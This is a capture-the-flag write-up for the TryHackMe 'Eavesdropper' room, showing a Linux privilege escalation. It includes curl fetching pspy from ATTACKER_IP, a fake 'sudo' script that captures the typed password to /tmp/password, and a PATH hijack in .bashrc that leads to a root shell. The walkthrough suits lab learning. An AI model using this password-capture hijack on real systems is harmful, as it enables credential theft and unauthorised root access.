🕵️Eavesdropper - CTF Write-Up - TryHackme

Listen closely and you might hear a password!

Eavesdropper

Linux

Hijacking

Groups and Permissions

Table of Contents
Enumeration
Concept
Exploitation

Room Link : https://tryhackme.com/room/eavesdropper

Enumeration

As the room's title suggests, our objective is to eavesdrop in order to obtain the password. I've explored various common enumeration methods within this room, testing different ways to exploit it—while some approaches showed promise, most did not yield the desired results.

To keep this write-up concise, let's dive right in. Our initial step involves checking for running processes.

ps -aux

# Output would be something like this
frank@workstation:~$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  1.0  1.4  12172  7220 ?        Ss   16:48   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root          69  2.2  1.8  13580  8948 ?        Ss   16:49   0:00 sshd: frank [priv]
frank        105  0.0  1.0  13904  5228 ?        S    16:49   0:00 sshd: frank@pts/0
frank        107  0.1  0.8   5992  3860 pts/0    Ss   16:49   0:00 -bash
frank        115  0.0  0.6   7644  3280 pts/0    R+   16:49   0:00 ps aux

Upon examining the situation, it becomes evident that there's another SSH process running with elevated privileges. To monitor this process discreetly, we will employ the 'pspy' tool. Follow these steps:

1. Download the 'pspy' tool from the following link: Releases · DominicBreuker/pspy.

2. Once downloaded, proceed to deploy the tool for further investigation.

# Start a webserver where you have downloaded the pspy binary
python -m http.server 8080

# Change to /tmp dir
cd /tmp
# deploy pspy64
curl http://ATTACKER_IP:8080/pspy64 -o pspy
# Provide permission to execute
chmod +x pspy

While monitoring the processes, focus on those with the UID=0, as they are typically root processes. Look for any relevant details in these processes.

spying on the process

sudo cat /etc/shadow

To obtain the password, we must hijack the process. It's worth noting that "sudo" is being called via a relative path.

Here's the concept:

By altering the value in the path variable and creating our own "sudo" command, we can hijack the process. Let's proceed with the coding steps.

# Change to /tmp dir
# Create a file called sudo
# Enter the following contents

#!/bin/bash
read -p "Password : " pass
echo $pass > /tmp/password

Now provide executable permission

chmod +x /tmp/sudo

Exploitation

Finally change the PATH variable inside .bashrc file in /home/frank, one thing to note is that you need to enter this path as the first line in .bashrc file

change the path variable

PATH=/tmp:$PATH

1. Log out of the current SSH session.

2. Log back in; you should now have the password.

3. Once logged in, comment out the PATH variable from the bashrc file.

4. Log out again.

5. Log back in to obtain a root shell.

log back in to the machine

# type the following command to get root
sudo -i

enter the password

Provide the password, and you will have the root shell.

# Get the flag
cat /root/flag.txt

get the flag

I hope you had fun, learning new stuff ☺️ ❤️